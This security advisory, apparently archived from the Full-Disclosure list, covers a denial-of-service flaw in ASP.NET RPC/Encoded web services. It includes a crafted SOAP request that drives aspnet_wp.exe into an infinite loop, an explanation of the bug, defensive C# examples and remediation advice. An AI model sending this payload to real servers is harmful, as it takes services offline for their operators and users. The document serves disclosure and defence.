[Full-disclosure] ASP.NET RPC/Encoded Web service DOS

2005-07-12T00:00:00
ID SECURITYVULNS:DOC:9129
Type securityvulns
Reporter Securityvulns
Modified 2005-07-12T00:00:00

Description

ASP.NET RPC/Encoded Web service DOS
http://www.spidynamics.com/spilabs/advisories/aspRCP.html

Release Date: July 11, 2005
Severity: High

[System Affected]
* IIS servers exposing ASP.NET Web services that consume arrays in RPC/Encoded mode
* Applications using System.Xml.Serialization to consume untrusted data in RPC/Encoded mode

[Description]
We have found that by sending a custom SOAP message to an RPC/Encoded web method which accepts an array (or any object derived from IList, such as StringCollection or ArrayList), we can cause the aspnet_wp.exe process to consume 100% of the system resources. More than one request may be required to create this condition on faster systems.

To replicate the issue, we can send a request to the Test(int[] someList) web method defined inside the AspCrashWebService project (refer to AspCrashWebService.zip distributed with this document). A normal SOAP message calling this method with a single element whose value is 0 would look like:

    <?xml version="1.0" encoding="utf-16"?>
    <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
                   xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"
                   xmlns:tns="http://tempuri.org/"
                   xmlns:types="http://tempuri.org/encodedTypes"
                   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
                   xmlns:xsd="http://www.w3.org/2001/XMLSchema">
      <soap:Body soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
        <tns:Test>
          <someList href="#id1" />
        </tns:Test>
        <soapenc:Array id="id1" soapenc:arrayType="xsd:int[1]">
          <Item>0</Item>
        </soapenc:Array>
      </soap:Body>
    </soap:Envelope>

If we replace the <soapenc:Array> element with the complex type defined in our demo ASPCrashWebService.Service1 WSDL definition (ArrayOfInt), we will trigger the problem in aspnet_wp.exe. The modified request would look like:

    <?xml version="1.0" encoding="utf-16"?>
    <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
                   xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"
                   xmlns:tns="http://tempuri.org/"
                   xmlns:types="http://tempuri.org/encodedTypes"
                   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
                   xmlns:xsd="http://www.w3.org/2001/XMLSchema">
      <soap:Body soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
        <tns:Test>
          <someList href="#id1" />
        </tns:Test>
        <tns:ArrayOfInt>
          <Item>0</Item>
        </tns:ArrayOfInt>
      </soap:Body>
    </soap:Envelope>

We have found that the error is caused by an infinite loop inside System.Xml.Serialization.XmlSerializationReader.ReadReferencedElements(). The method can be translated to the following code:

    protected void ReadReferencedElements()
    {
        string V_0;   // decompiler temporary: receives the fixup reference of each element read

        // r is the XmlReader that backs this XmlSerializationReader instance
        r.MoveToContent();
        while (r.NodeType != XmlNodeType.EndElement && r.NodeType != XmlNodeType.None)
        {
            ReadReferencingElement(null, null, true, out V_0);
            r.MoveToContent();
        }
        DoFixups();
        HandleUnreferencedObjects();
    }

The problem is that when ReadReferencingElement() does not recognise the element it is positioned on, it returns without consuming it, so r.NodeType is still XmlNodeType.Element after the call and the while loop never terminates.
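The defensive pattern that this bug illustrates is that a loop driven by a pull parser must consume or skip the current node on every iteration, never trusting the callee to have done so. The following C# is an added example (not SPI Dynamics' code, nor Microsoft's serializer or its patch): a small reader for the soapenc:Array elements directly under soap:Body, written the way the loop above should have been. Any Body child it does not recognise is skipped with XmlReader.Skip() instead of being left in place, and an element-count cap bounds the work per message. The two embedded SOAP messages are constructed copies of the advisory's requests; the MaxElements limit and all names here are assumptions of the example.

```csharp
using System;
using System.Collections.Generic;
using System.IO;
using System.Xml;

// Added example: a referenced-element loop that is guaranteed to make progress.
public static class SafeReferencedElements
{
    const string SoapEnvNs = "http://schemas.xmlsoap.org/soap/envelope/";
    const string SoapEncNs = "http://schemas.xmlsoap.org/soap/encoding/";
    const int MaxElements = 1000;   // constructed bound on top-level Body children

    // Returns the items of every soapenc:Array found directly under soap:Body, keyed by id.
    // Unknown elements (such as <tns:ArrayOfInt> in the advisory) are skipped, not looped on.
    public static Dictionary<string, List<string>> ReadArrays(string soapMessage)
    {
        var arrays = new Dictionary<string, List<string>>();
        var settings = new XmlReaderSettings { DtdProcessing = DtdProcessing.Prohibit };
        using (var r = XmlReader.Create(new StringReader(soapMessage), settings))
        {
            if (!r.ReadToFollowing("Body", SoapEnvNs))
                throw new XmlException("message has no soap:Body");
            r.ReadStartElement();   // step inside <soap:Body>
            r.MoveToContent();

            int seen = 0;
            while (r.NodeType != XmlNodeType.EndElement && r.NodeType != XmlNodeType.None)
            {
                if (++seen > MaxElements)
                    throw new XmlException("too many top-level elements in soap:Body");

                if (r.NodeType == XmlNodeType.Element && r.NamespaceURI == SoapEncNs && r.LocalName == "Array")
                {
                    string id = r.GetAttribute("id") ?? ("anon" + seen);
                    arrays[id] = ReadArrayItems(r);   // consumes the whole <soapenc:Array>
                }
                else
                {
                    // The fix for the class of bug in the advisory: an element we do not
                    // understand is consumed here, so the reader can never stay put.
                    r.Skip();
                }
                r.MoveToContent();
            }
        }
        return arrays;
    }

    static List<string> ReadArrayItems(XmlReader r)
    {
        var items = new List<string>();
        if (r.IsEmptyElement) { r.Read(); return items; }
        r.ReadStartElement();                            // <soapenc:Array>
        r.MoveToContent();
        while (r.NodeType == XmlNodeType.Element)
        {
            items.Add(r.ReadElementContentAsString());   // <Item>0</Item>, reader moves past it
            r.MoveToContent();
        }
        r.ReadEndElement();                              // </soapenc:Array>
        return items;
    }

    public static void Main()
    {
        // Constructed copies of the advisory's two requests (unused namespaces dropped).
        const string Normal = @"<soap:Envelope xmlns:soap=""http://schemas.xmlsoap.org/soap/envelope/""
            xmlns:soapenc=""http://schemas.xmlsoap.org/soap/encoding/"" xmlns:tns=""http://tempuri.org/""
            xmlns:xsd=""http://www.w3.org/2001/XMLSchema""><soap:Body>
            <tns:Test><someList href=""#id1""/></tns:Test>
            <soapenc:Array id=""id1"" soapenc:arrayType=""xsd:int[1]""><Item>0</Item></soapenc:Array>
            </soap:Body></soap:Envelope>";
        const string Malformed = @"<soap:Envelope xmlns:soap=""http://schemas.xmlsoap.org/soap/envelope/""
            xmlns:soapenc=""http://schemas.xmlsoap.org/soap/encoding/"" xmlns:tns=""http://tempuri.org/""><soap:Body>
            <tns:Test><someList href=""#id1""/></tns:Test>
            <tns:ArrayOfInt><Item>0</Item></tns:ArrayOfInt>
            </soap:Body></soap:Envelope>";

        foreach (var kv in ReadArrays(Normal))
            Console.WriteLine(kv.Key + ": [" + string.Join(",", kv.Value) + "]");   // id1: [0]
        Console.WriteLine("malformed message: " + ReadArrays(Malformed).Count + " arrays read, loop terminated");
    }
}
```

Throwing on an unrecognised referenced element would also be acceptable for a deserializer; what matters is that the reader position changes, or the loop exits, on every pass.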

[Remediation]
RPC/Encoded web services are not recommended by Microsoft. Developers should use document/literal instead, which is not affected by this issue. The Microsoft Security Response Center has stated that this issue will be addressed in the upcoming "Whidbey" release of Web Services. In the interim, the aspnet_wp.exe process can be restarted and operation will resume without problems.
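What the recommended change looks like in an ASP.NET web service, as an added example that is not the advisory's AspCrashWebService project: the same Test method declared in the affected RPC/Encoded style and in the document/literal style. The class names are assumptions of the example; the attributes are the real System.Web.Services ones (WebServiceBinding.ConformsTo requires .NET Framework 2.0 or later).

```csharp
using System.Web.Services;
using System.Web.Services.Description;
using System.Web.Services.Protocols;

// Affected style: [SoapRpcMethod] (or [SoapRpcService] on the class) selects rpc/encoded,
// so clients send soapenc:Array elements with href/id references, the message shape that
// reaches XmlSerializationReader.ReadReferencedElements().
[WebService(Namespace = "http://tempuri.org/")]
public class EncodedService : WebService
{
    [WebMethod]
    [SoapRpcMethod]
    public int Test(int[] someList) { return someList.Length; }
}

// Remediated style: document/literal. This is the ASP.NET default when no SoapRpc*
// attribute is present; Use = Literal is stated explicitly so the intent survives
// refactoring, and ConformsTo = BasicProfile1_1 makes ASP.NET validate the service
// against WS-I Basic Profile 1.1 (which forbids rpc/encoded) when it builds the service
// description, so a method that slips back to [SoapRpcMethod] is rejected at startup
// rather than silently exposed.
[WebService(Namespace = "http://tempuri.org/")]
[WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)]
public class LiteralService : WebService
{
    [WebMethod]
    [SoapDocumentMethod(Use = SoapBindingUse.Literal)]
    public int Test(int[] someList) { return someList.Length; }
}
```

A quick way to audit an existing code base for the affected style is to search for SoapRpcMethod and SoapRpcService attributes, and for generated WSDL whose binding operations carry use="encoded".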

[Credit]
Discovery: Bryan Sullivan
Research: Sacha Faust

Contact Information
spilabs@spidynamics.com
SPI Dynamics, Inc.
115 Perimeter Center Place N.E., Suite 1100
Atlanta, GA 30346
Toll-Free Phone: (866) 774-2700

SPI Dynamics was founded in 2000 by a team of accomplished Web security specialists; SPI Dynamics is the leader in Web application security technology. With such signature products as WebInspect, SPI Dynamics is dedicated to protecting companies' most valuable assets. SPI Dynamics has created a new breed of Internet security products for the Web application, the most vulnerable yet least secure component of online business infrastructure.

Copyright (c) 2005 SPI Dynamics, Inc. All rights reserved worldwide.


Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/